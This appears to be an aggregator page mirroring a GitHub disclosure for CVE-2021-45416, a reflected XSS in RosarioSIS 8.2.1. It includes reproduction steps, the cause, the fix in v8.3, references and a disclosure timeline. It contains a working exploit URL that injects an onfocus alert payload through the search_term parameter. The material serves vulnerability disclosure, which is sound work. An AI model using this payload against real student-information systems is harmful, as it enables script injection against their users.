Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-45416 PoC — RosarioSis 跨站脚本漏洞

Source
https://github.com/86x/CVE-2021-45416
Associated Vulnerability
Title:RosarioSis 跨站脚本漏洞 (CVE-2021-45416)
Description:RosarioSis是一个免费和开源的学生信息系统。用于管理学生,创建报告并做出正确的决策。 RosarioSIS 8.2.1存在跨站脚本漏洞,该漏洞允许攻击者可利用该漏洞通过调度课程.php脚本模块中的搜索词参数注入任意HTML。
Description
Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.
Readme
# CVE-2021-45416
Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.

- Vendor: francoisjacquet
- Vendor Website: https://www.rosariosis.org/
- Affected Product: RosarioSIS
- Affected Versions: v8.2.1, however it is _assumed_ earlier versions might be affected as well

---

### Instructions to reproduce: 
- Use RosarioSIS 8.2.1.
- Open the URL vulnerable to XSS: http://localhost/rosariosis/Modules.php?modname=misc/ChooseCourse.php&modfunc=choose_course&course_modfunc=search&last_year=&search_term=%22%20onfocus%3D%22alert%28%60XSS%60%29 (make sure to replace localhost/rosariosis with your web server's path)
- **Note that this website needs to be opened in a popup, for example using the javascript window.open() method. A proof of concept code is available in this repo.**

### Cause
User-supplied input in the search_term parameter is improperly neutralized in the modules/Scheduling/Courses.php script, which is accessible through ChooseCourse.php and ChooseRequest.php as shown in the proof of concept that you can find in this repo.

### Solution
Update to the latest version of RosarioSIS. This issue was fixed in version v8.3.

### References 
- YouTube video showing the proof of concept: https://www.youtube.com/watch?v=PvFUxSGpWpY
- Commit containing the fix: https://gitlab.com/francoisjacquet/rosariosis/-/commit/aec018065ca12ecef03ee454a8112f992ea35315
- Changelog for version v8.3: https://gitlab.com/francoisjacquet/rosariosis/blob/mobile/CHANGES.md#changes-in-83

---

#### History (in the format dd.mm.yyyy)
- 01.02.2022 - CVE published by MITRE
- 27.01.2022 - CVE was assigned and marked as reserved
- 17.12.2021 - Requested CVE through MITRE webform
- 22.10.2021 - Vendor released new version containing the fix (v8.3)
- 20.10.2021 - Received reply from vendor, along with a link to a new commit fixing the issue and the announcement that a new release containing the fix will follow in the same week. Vendor asked me to wait two months after that release before public disclosure.
- 20.10.2021 - Initial report to vendor
- 20.10.2021 - Finding of vulnerability
File Snapshot

 [4.0K]  /data/pocs/ae08fe63482204c5f3379a4dd181bf9068e39ca3
├── [2.2K]  README.md
└── [1.0K]  RosarioSIS_PoC.htm

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.